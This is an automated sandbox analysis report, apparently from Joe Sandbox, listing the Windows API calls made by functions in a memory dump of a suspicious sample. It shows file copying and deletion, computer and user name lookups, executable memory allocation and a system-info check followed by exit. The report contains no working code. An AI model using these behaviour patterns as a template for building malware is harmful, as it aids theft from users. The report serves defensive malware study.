Part of subcall function 00414B60: lstrcatA.KERNEL32(?,00420FE0), ref: 00414CAC
Part of subcall function 00414B60: lstrcatA.KERNEL32(?,?), ref: 00414CC0
Part of subcall function 00414B60: lstrcatA.KERNEL32(?,00420FE4), ref: 00414CD2
Part of subcall function 00414B60: lstrcatA.KERNEL32(?,?), ref: 00414CE6
Part of subcall function 00414B60: CopyFileA.KERNEL32(?,?,00000001), ref: 00414CFC
Part of subcall function 00414B60: DeleteFileA.KERNEL32(?), ref: 00414D81

Part of subcall function 00414B60: wsprintfA.USER32 ref: 00414C57

Memory Dump Source

Source File: 00000000.00000002.1907555861.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DbMBWMxoNv.jbxd

Yara matches

Similarity

API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
String ID:
API String ID: 2104210347-0
Opcode ID: 212264ccc3be99d19daccba7bcdd5e8e37dbd75d85b62b2c0b663e80c7940093
Instruction ID: e9161ec81bcd1d29be655bd6d91fa6844fd782dbdf96c1af6834d1d6ae200bb8
Opcode Fuzzy Hash: 212264ccc3be99d19daccba7bcdd5e8e37dbd75d85b62b2c0b663e80c7940093
Instruction Fuzzy Hash: F041B6B7E0410467C754F764FC52EEE333E9BC8304F40855EB54696191ED78AAC88B95

Function 00413EE0 Relevance: 3.1, APIs: 2, Instructions: 69stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 00413EFB

Part of subcall function 00413B00: wsprintfA.USER32 ref: 00413B1C
Part of subcall function 00413B00: FindFirstFileA.KERNEL32(?,?), ref: 00413B33

strtok_s.MSVCRT ref: 00413FA2

Memory Dump Source

Source File: 00000000.00000002.1907555861.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DbMBWMxoNv.jbxd

Yara matches

Similarity

API ID: strtok_s$FileFindFirstwsprintf
String ID:
API String ID: 3409980764-0
Opcode ID: 4fad78351a43c5c712957354f8fa6e0fac572ba1f5a33e58d832eb633f9903fa
Instruction ID: d343bc180a792a7fd1e44b9e5f27ec9e14af1d391bf32c604727e1a3d9e2bb4a
Opcode Fuzzy Hash: 4fad78351a43c5c712957354f8fa6e0fac572ba1f5a33e58d832eb633f9903fa
Instruction Fuzzy Hash: 3621A170A00208ABDB20EF65DC52FED7779AF44305F40406AF90E9A191EB746B89C7A9

Function 00401160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00416CB7,00420AF3), ref: 0040116A
ExitProcess.KERNEL32 ref: 0040117E

Memory Dump Source

Source File: 00000000.00000002.1907555861.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DbMBWMxoNv.jbxd

Yara matches

Similarity

API ID: ExitInfoProcessSystem
String ID:
API String ID: 752954902-0
Opcode ID: 0911bb23926965f42d7cc1f5d35b7be77a6f2882a7c2442a84db88c73d1ba697
Instruction ID: 7de8415141d8ede1392e5156f4839a36e98c975bb62c62673ce2cce929d499c4
Opcode Fuzzy Hash: 0911bb23926965f42d7cc1f5d35b7be77a6f2882a7c2442a84db88c73d1ba697
Instruction Fuzzy Hash: 9ED05E74D0530DABCB04DFE09D496DDBB79BB0C315F041656DD0572240EA305441CA66

Function 0040B4C0 Relevance: 2.9, APIs: 2, Instructions: 397stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22

Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92

Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15

Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6

Part of subcall function 0040A560: memcmp.MSVCRT(?,v20,00000003), ref: 0040A57D

lstrlenA.KERNEL32(00000000), ref: 0040B992
lstrlenA.KERNEL32(00000000), ref: 0040B9A6

Memory Dump Source

Source File: 00000000.00000002.1907555861.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DbMBWMxoNv.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat$memcmp
String ID:
API String ID: 3457870978-0
Opcode ID: edf6a129fa2679d4d0560d653463580dab94da1c0555383ef44ac3bdeeb92784
Instruction ID: 2255bc3e1aae02863dcd83073914f46634cd1c5da6bc7bd4c07d15e0a17c61c2
Opcode Fuzzy Hash: edf6a129fa2679d4d0560d653463580dab94da1c0555383ef44ac3bdeeb92784
Instruction Fuzzy Hash: BAE14672A111189BCB04FBA1DD66EEE7339AF14314F40459EF10672095EF387B98CB6A

Function 0040AEC0 Relevance: 2.7, APIs: 2, Instructions: 236stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22

Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92

Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15

lstrlenA.KERNEL32(00000000), ref: 0040B13A
lstrlenA.KERNEL32(00000000), ref: 0040B14E

Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6

Memory Dump Source

Source File: 00000000.00000002.1907555861.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DbMBWMxoNv.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID:
API String ID: 2500673778-0
Opcode ID: 37214c26addd6c492048424ff821300c047d91bdfb42042cd6cb02d54dd3724b
Instruction ID: b118e420acb74f1bad9678fc0f4fca3608bd39bb9752133bd9c886ddfd0b535b
Opcode Fuzzy Hash: 37214c26addd6c492048424ff821300c047d91bdfb42042cd6cb02d54dd3724b
Instruction Fuzzy Hash: A8916672A151089BCB04FBA1DC66DEE7339AF14314F40456FF10663195EF387A98CB6A

Function 0040B200 Relevance: 2.7, APIs: 2, Instructions: 205stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22

Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92

Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15

lstrlenA.KERNEL32(00000000), ref: 0040B3FE
lstrlenA.KERNEL32(00000000), ref: 0040B412

Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6

Memory Dump Source

Source File: 00000000.00000002.1907555861.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DbMBWMxoNv.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID:
API String ID: 2500673778-0
Opcode ID: 495f537410fd0a2a4d4edd18f9d046d7993cb55dce315c88d98444e8eea93caf
Instruction ID: df39fec182a976cf14ea74314fd1cc2d61bc45c83f0c5b543270b10835f39725
Opcode Fuzzy Hash: 495f537410fd0a2a4d4edd18f9d046d7993cb55dce315c88d98444e8eea93caf
Instruction Fuzzy Hash: B4715271A111089BCB04FBA1DCA6DEE733AAF14314F40456FF50267195EF387A58CBAA

Function 004066B0 Relevance: 2.6, APIs: 2, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00406E0E,00406E0E,00003000,00000040), ref: 00406756
VirtualAlloc.KERNEL32(00000000,00406E0E,00003000,00000040), ref: 004067A3

Memory Dump Source

Source File: 00000000.00000002.1907555861.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DbMBWMxoNv.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: bff2cd72ca51f604b8cae6ffaccc6788292cd5c635fa360249288f38c6295135
Instruction ID: 1e55e6aee22da07579867dcc14e26085db0c1923c06382e7ddd462ac09197dec
Opcode Fuzzy Hash: bff2cd72ca51f604b8cae6ffaccc6788292cd5c635fa360249288f38c6295135
Instruction Fuzzy Hash: 6041D474A00209EFCB54CF58C494BADBBB1FF44314F1486A9E949AB385D735EA91CF84

Function 004010A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004,?,?,?,0040114E,?,?,00416CBC), ref: 004010B3
VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0,?,?,?,0040114E,?,?,00416CBC), ref: 004010F7

Memory Dump Source

Source File: 00000000.00000002.1907555861.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DbMBWMxoNv.jbxd

Yara matches

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: 4ccb3339a7f6084aabfd7cf6baf65b53e8baa26228d10618978cb16090ab9117
Instruction ID: a2dd58c0224e163af538114889642f36ecbeef109afe3d50a53e5cb7169f74e2
Opcode Fuzzy Hash: 4ccb3339a7f6084aabfd7cf6baf65b53e8baa26228d10618978cb16090ab9117
Instruction Fuzzy Hash: 74F0E2B1A42208BBE7149AA4AC59FAFB799E705B04F300459F540E3290D571AF00DAA4

Function 00418F20 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,?,00410277,?,00000000,?,00000000,00420DB2,00420DAF), ref: 00418F2F

Memory Dump Source

Source File: 00000000.00000002.1907555861.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DbMBWMxoNv.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 5473cf69d3c431c8ce71db9d776b0fb8fb314c6ca43b030d69b23a18ba04e691
Instruction ID: 622f2f336d6b1c39152e8ed1c6124f6159486e78b27092244718ebba6cc61b65
Opcode Fuzzy Hash: 5473cf69d3c431c8ce71db9d776b0fb8fb314c6ca43b030d69b23a18ba04e691
Instruction Fuzzy Hash: 7EF01C70D0520CEBCB00EF94D4496DDBB75EB00324F10819AE82967280DB385B96CB89

Function 00418F70 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418F9B

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Memory Dump Source

Source File: 00000000.00000002.1907555861.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DbMBWMxoNv.jbxd

Yara matches

Similarity

API ID: FolderPathlstrcpy
String ID:
API String ID: 1699248803-0
Opcode ID: 6d5c486f1174f401a7d52f4a33802c5c22497fe214560b0ce90e5b19e21db00a
Instruction ID: e79076dc3140f9edc5567924fb21932d6a0b2d79ef3805787682db2ce51b8011
Opcode Fuzzy Hash: 6d5c486f1174f401a7d52f4a33802c5c22497fe214560b0ce90e5b19e21db00a
Instruction Fuzzy Hash: 92E0127194434C6BDB51DB50CC96FDD776D9B44B11F004295BA0C5B1C0DE70AB858B95

Function 00401190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00417A70: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416CCB), ref: 00417AA0
Part of subcall function 00417A70: HeapAlloc.KERNEL32(00000000,?,?,?,00416CCB), ref: 00417AA7
Part of subcall function 00417A70: GetComputerNameA.KERNEL32(?,00000104), ref: 00417ABF

Part of subcall function 004179E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417A10
Part of subcall function 004179E0: HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417A17
Part of subcall function 004179E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00417A2F

ExitProcess.KERNEL32 ref: 004011C6

Memory Dump Source

Source File: 00000000.00000002.1907555861.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DbMBWMxoNv.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocName$ComputerExitUser
String ID:
API String ID: 1004333139-0
Opcode ID: dcd40bd9b7440eb8545f2694ec48fb4b44b4fea9788a6d776e7c72e508f0613a
Instruction ID: bcf4cddec8ba3652d3daa4bfa83a7295d39fc22ea0064294e7a9f420d8d9705c
Opcode Fuzzy Hash: dcd40bd9b7440eb8545f2694ec48fb4b44b4fea9788a6d776e7c72e508f0613a
Instruction Fuzzy Hash: E1E0ECB5D5820152DB1473B6AC06B5B339D5B1934EF04142FF90896252FE29F8404169

Function 00418FC0 Relevance: 1.3, APIs: 1, Instructions: 35memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418FE2

Memory Dump Source

Source File: 00000000.00000002.1907555861.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DbMBWMxoNv.jbxd

Yara matches

Similarity

API ID: AllocLocal
String ID:
API String ID: 3494564517-0
Opcode ID: 4258c76c4f47740e30e0af574e778a78e5a168a413d5b1b985f8475468444836
Instruction ID: 2ef851ca14c40c78e639e083eff5f81397fed5015ff254102f8bdb6ea656854d
